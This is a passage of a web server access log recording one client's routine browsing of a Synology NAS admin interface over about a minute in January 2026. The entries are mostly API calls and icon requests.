(KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:52:04 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 4321] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:52:08 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 471] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:52:09 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 180] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:52:09 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 86] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:52:09 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 187] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:52:10 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 11038] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:52:13 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 4321] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:52:14 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 86] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:52:19 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 471] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:52:19 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 180] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:52:19 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 86] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:52:23 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 42] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:52:24 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 86] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:52:25 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 187] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:52:26 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 7100] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:52:26 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/ResourceMonitor/images/default/1x/cate_tree_arrow.png?v=2787a7fba33f2cf479adf9c40566a948" [Client 84.1.26.27] [Length 377] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/webman/modules/ResourceMonitor/style.css?v=1661421011" +[15/Jan/2026:13:52:26 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/ResourceMonitor/images/default/1x/favicon_16.png?v=7411b5b92246cc2a8409fc0a56026118" [Client 84.1.26.27] [Length 364] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/webman/modules/ResourceMonitor/style.css?v=1661421011" +[15/Jan/2026:13:52:26 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/ResourceMonitor/images/default/1x/DSMsetting_16.png?v=2a0778c2b577ea0d9bc10a0c4d55015c" [Client 84.1.26.27] [Length 410] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/webman/modules/ResourceMonitor/style.css?v=1661421011" +[15/Jan/2026:13:52:26 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/ResourceMonitor/images/default/1x/other_app_16.png?v=cbf9acbf76fd8c8799ac17593f40d67f" [Client 84.1.26.27] [Length 292] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/webman/modules/ResourceMonitor/style.css?v=1661421011" +[15/Jan/2026:13:52:26 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/AdminCenter/images/1x/home_icons/icn_file_services.png" [Client 84.1.26.27] [Length 1773] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:52:26 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/AdminCenter/images/1x/home_icons/icn_external_access.png" [Client 84.1.26.27] [Length 2251] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:52:26 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/AdminCenter/images/1x/home_icons/icn_task_scheduler.png" [Client 84.1.26.27] [Length 1472] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:52:26 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/AdminCenter/images/1x/home_icons/icn_indexing_service.png" [Client 84.1.26.27] [Length 2220] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:52:26 +0000] - 200 200 - GET https nas.profibot.hu "/webman/modules/AdminCenter/images/1x/home_icons/icn_terminal_and_SNMP.png" [Client 84.1.26.27] [Length 1583] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:52:26 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.Core.Synohdpack&version=1&method=getHDIcon&res=72&retina=false&path=webman/3rdparty/MariaDB10/images/MariaDB_{0}.png" [Client 84.1.26.27] [Length 3853] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:52:26 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.Core.Synohdpack&version=1&method=getHDIcon&res=72&retina=false&path=webman/3rdparty/VideoStation/images/app/VideoStation_{0}.png" [Client 84.1.26.27] [Length 4383] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:52:26 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.Core.Synohdpack&version=1&method=getHDIcon&res=72&retina=false&path=webman/3rdparty/LogCenter/images/log_center_{0}.png" [Client 84.1.26.27] [Length 2886] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:52:26 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.Core.Synohdpack&version=1&method=getHDIcon&res=72&retina=false&path=webman/3rdparty/WebDAVServer/images/icon/WebDav_{0}.png" [Client 84.1.26.27] [Length 8831] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:52:26 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.Core.Synohdpack&version=1&method=getHDIcon&res=72&retina=false&path=webman/3rdparty/FileBrowser/images/icon/FileStation_{0}.png" [Client 84.1.26.27] [Length 6277] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:52:26 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.Core.Synohdpack&version=1&method=getHDIcon&res=72&retina=false&path=webman/3rdparty/ActiveInsight/images/ActiveInsight_{0}.png" [Client 84.1.26.27] [Length 2957] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:52:26 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.Core.Synohdpack&version=1&method=getHDIcon&res=72&retina=false&path=webman/3rdparty/SynoFinder/images/icon/UniversalSearch_{0}.png" [Client 84.1.26.27] [Length 7016] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:52:26 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.Core.Synohdpack&version=1&method=getHDIcon&res=72&retina=false&path=webman/3rdparty/CloudSync/images/CloudSync_{0}.png" [Client 84.1.26.27] [Length 8807] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:52:26 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.Core.Synohdpack&version=1&method=getHDIcon&res=72&retina=false&path=webman/3rdparty/AudioStation/images/AudioStation_{0}.png" [Client 84.1.26.27] [Length 5019] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:52:26 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.Core.Synohdpack&version=1&method=getHDIcon&res=72&retina=false&path=webman/3rdparty/DownloadStation/images/download_station_{0}.png" [Client 84.1.26.27] [Length 3665] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:52:26 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.Core.Synohdpack&version=1&method=getHDIcon&res=72&retina=false&path=webman/3rdparty/SynologyPhotos/images/icon/photos_{0}.png" [Client 84.1.26.27] [Length 6894] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:52:26 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.Core.Synohdpack&version=1&method=getHDIcon&res=72&retina=false&path=webman/3rdparty/MediaServer/images/MediaServer_{0}.png" [Client 84.1.26.27] [Length 5777] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:52:26 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.Core.Synohdpack&version=1&method=getHDIcon&res=72&retina=false&path=webman/3rdparty/SynologyDrive/images/DriveAdminConsole_{0}.png" [Client 84.1.26.27] [Length 6321] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:52:26 +0000] - 200 200 - GET https nas.profibot.hu "/webapi/entry.cgi?api=SYNO.Core.Synohdpack&version=1&method=getHDIcon&res=72&retina=false&path=webman/3rdparty/DirectoryServer/images/LDAPServer_{0}.png" [Client 84.1.26.27] [Length 6427] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:52:27 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 11036] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:52:28 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 65] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:52:29 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 471] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:52:29 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 180] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:52:29 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 7314] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:52:30 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 7296] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:52:30 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 86] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:52:30 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 4321] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:52:33 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 7075] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:52:35 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 86] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:52:36 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 7192] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:52:37 +0000] - 200 200 - GET https nas.profibot.hu "/scripts/ext-3/ux/images/1x/grid_bt_prev_next_toend.png?v=4c5a44af44c4aa4164507c3bffde83e9" [Client 84.1.26.27] [Length 1343] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/scripts/ext-3/ux/ux-all.css?v=1650348555" +[15/Jan/2026:13:52:37 +0000] - 200 200 - GET https nas.profibot.hu "/scripts/ext-3/ux/images/1x/grid_bt_prev_next_double.png?v=914c29754b1e299d57eaeaf288b64343" [Client 84.1.26.27] [Length 1491] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/scripts/ext-3/ux/ux-all.css?v=1650348555" +[15/Jan/2026:13:52:37 +0000] - 200 200 - GET https nas.profibot.hu "/scripts/ext-3/ux/images/1x/grid_bt_refresh.png?v=801cb062e3427dfca989330959c12747" [Client 84.1.26.27] [Length 1085] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/scripts/ext-3/ux/ux-all.css?v=1650348555" +[15/Jan/2026:13:52:37 +0000] - 200 200 - GET https nas.profibot.hu "/scripts/ext-3/ux/images/1x/grid_bt_more.png?v=f14250b527a42d4e0676943aa51bf1ed" [Client 84.1.26.27] [Length 158] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/scripts/ext-3/ux/ux-all.css?v=1650348555" +[15/Jan/2026:13:52:38 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 233] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:52:39 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 7159] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:52:39 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 471] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:52:40 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 180] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:52:40 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 62] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:52:40 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 62] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:52:40 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 187] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:52:41 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 233] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:52:41 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 11046] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:52:43 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 86] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:52:45 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 4321] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:52:48 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 86] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:52:49 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 471] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:52:50 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 180] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:52:51 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 92] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:52:52 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 579] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:52:53 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 86] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:52:55 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 187] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:52:56 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 11046] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:52:58 +0000] - 200 200 - POST https nas.profibot.hu "/webapi/entry.cgi" [Client 84.1.26.27] [Length 65] [Gzip -] [Sent-to 192.168.100.30] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://nas.profibot.hu/" +[15/Jan/2026:13:52:58 +0000] - 200 200 - 